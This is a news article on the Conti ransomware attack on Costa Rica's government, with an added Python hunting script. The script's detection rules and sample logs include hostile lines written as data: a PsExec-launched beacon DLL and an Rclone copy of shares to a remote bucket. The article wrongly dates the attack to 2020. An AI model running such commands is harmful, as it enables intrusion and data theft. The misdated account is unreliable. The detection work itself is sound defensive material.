Costa Rica faced a massive Conti ransomware attack damaging the government sector
Security researchers have published details of the Costa Rican government's data breach by the Conti ransomware gang. The details cover the precision of the Conti attack, its initial access, and the final stage of encrypting devices.
The Conti ransomware group ran a five-day intrusion operation against both the Costa Rican government and the private sector, including local schools and national healthcare systems, in 2020.
The cyber intelligence company Advanced Intelligence (AdvIntel) reported that the initial ransomware attack was carried out by a pro-Russian hacking group, which exfiltrated 672GB of data and deployed ransomware. The threat actor known as MemberX targeted devices in Costa Rica's Ministry of Finance and gained access via a VPN connection using compromised credentials. The group first deployed malware to compromise the system by stealing its credentials.
The AdvIntel security researchers said, “The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.”
The threat actor then used the Nltest command-line tool, which is part of the Remote Server Administration Tools (RSAT), to build a domain-trust relationship with the compromised system so that tasks could be performed remotely. They then scanned the network for files with the help of ShareFinder and AdFind.
Reportedly, MemberX deployed the Cobalt Strike backdoor, a paid penetration-testing product that attackers use to deploy agents or download files from enterprise domains. Security researchers said that the threat actor used a Cobalt Strike DLL beacon and ran it with the PsExec tool, which executes files remotely.
Researchers also said that the Conti operators gained access to every host on Costa Rica's interconnected networks to run DCSync and Zerologon attacks, which simulate the behavior of a domain controller and fetch password data. Security researchers said, “The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.”
They also noted that data could be retrieved via the Rclone command-line program, which can be used to manage files on multiple cloud storage services.
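The chain described above (Nltest trust enumeration, AdFind and ShareFinder discovery, PsExec-driven execution of a DLL beacon, and Rclone exfiltration) is visible in ordinary process-creation telemetry. The following is an added example, not code from the article or from AdvIntel: a small hunting rule set that flags each of those tools in Sysmon-style process-creation records and then summarizes which intrusion stages were seen on each host. The pipe-delimited log format, the host and user names, and the records themselves are constructed for this example; the tool names are the ones the article reports.

```python
"""Hunt for the tooling reported in the Costa Rica intrusion in process-creation logs.

Added defender-side example. The record format "host|user|parent image|command line"
and every sample record below are constructed; they are not real telemetry.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    parent: str   # image name of the parent process
    cmdline: str  # full command line of the created process


@dataclass(frozen=True)
class Rule:
    name: str
    stage: str                      # intrusion stage the article associates with the tool
    match: Callable[[Event], bool]


def _cmd(pattern: str) -> Callable[[Event], bool]:
    """Build a matcher that searches the command line, case-insensitively."""
    rx = re.compile(pattern, re.I)
    return lambda e: bool(rx.search(e.cmdline))


RULES: List[Rule] = [
    # Nltest queried for domain trusts (the article's trust-reconnaissance step)
    Rule("nltest domain-trust query", "reconnaissance",
         _cmd(r"\bnltest(\.exe)?\b.*/domain_trusts")),
    Rule("AdFind execution", "reconnaissance", _cmd(r"\badfind(\.exe)?\b")),
    Rule("ShareFinder invocation", "reconnaissance", _cmd(r"sharefinder")),
    # PsExec used to run the beacon DLL on a remote host
    Rule("PsExec launch", "lateral movement", _cmd(r"\bpsexec(64)?(\.exe)?\b")),
    # On the target, PsExec's service (PSEXESVC.exe) is the parent of what it runs
    Rule("rundll32 spawned by PsExec service", "lateral movement",
         lambda e: e.parent.lower() == "psexesvc.exe" and "rundll32" in e.cmdline.lower()),
    Rule("Rclone execution", "exfiltration", _cmd(r"\brclone(\.exe)?\b")),
]


def parse_line(line: str) -> Event:
    """Parse one constructed "host|user|parent|cmdline" record."""
    host, user, parent, cmdline = line.split("|", 3)
    return Event(host.strip(), user.strip(), parent.strip(), cmdline.strip())


def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, stage, rule name) for every record that matches a rule."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        for rule in RULES:
            if rule.match(ev):
                hits.append((ev.host, rule.stage, rule.name))
    return hits


def summarize(hits: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Map each flagged host to the sorted list of intrusion stages observed on it."""
    stages = defaultdict(set)
    for host, stage, _ in hits:
        stages[host].add(stage)
    return {host: sorted(s) for host, s in stages.items()}


# Constructed sample records (hypothetical hosts FIN-WS01, FIN-SRV02 and HR-WS07)
SAMPLE_LOG = [
    "FIN-WS01|finance\\jdoe|explorer.exe|C:\\Windows\\System32\\notepad.exe report.txt",
    "FIN-WS01|finance\\jdoe|cmd.exe|nltest.exe /domain_trusts",
    "FIN-WS01|finance\\jdoe|cmd.exe|C:\\Temp\\AdFind.exe -f objectcategory=computer",
    "FIN-WS01|finance\\jdoe|powershell.exe|powershell -c Invoke-ShareFinder",
    "FIN-WS01|finance\\admin|cmd.exe|PsExec64.exe \\\\FIN-SRV02 -s rundll32 C:\\Temp\\b.dll,Start",
    "FIN-SRV02|NT AUTHORITY\\SYSTEM|PSEXESVC.exe|rundll32.exe C:\\Temp\\b.dll,Start",
    "FIN-SRV02|finance\\admin|cmd.exe|rclone.exe copy D:\\Shares remote:bucket",
    "HR-WS07|finance\\asmith|explorer.exe|C:\\Program Files\\Office\\excel.exe budget.xlsx",
]

if __name__ == "__main__":
    for host, stage, name in detect(SAMPLE_LOG):
        print(f"{host:10} {stage:17} {name}")
    print(summarize(detect(SAMPLE_LOG)))
```

Each rule is keyed to a stage so that a host showing reconnaissance followed by lateral movement, or a server showing lateral movement followed by Rclone, stands out from isolated hits; the benign notepad and Excel records are left unflagged. In a real deployment the same rules would be expressed against Sysmon Event ID 1 or Windows Security Event 4688 fields rather than the constructed pipe format used here.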
The Conti group initially demanded a ransom of $10 million, which it raised to $20 million when the Costa Rican government refused to pay. The Costa Rican government declared a national emergency on May 8 as multiple devices were compromised across several government sectors. The Conti group later shut down its operations, announcing that it no longer existed.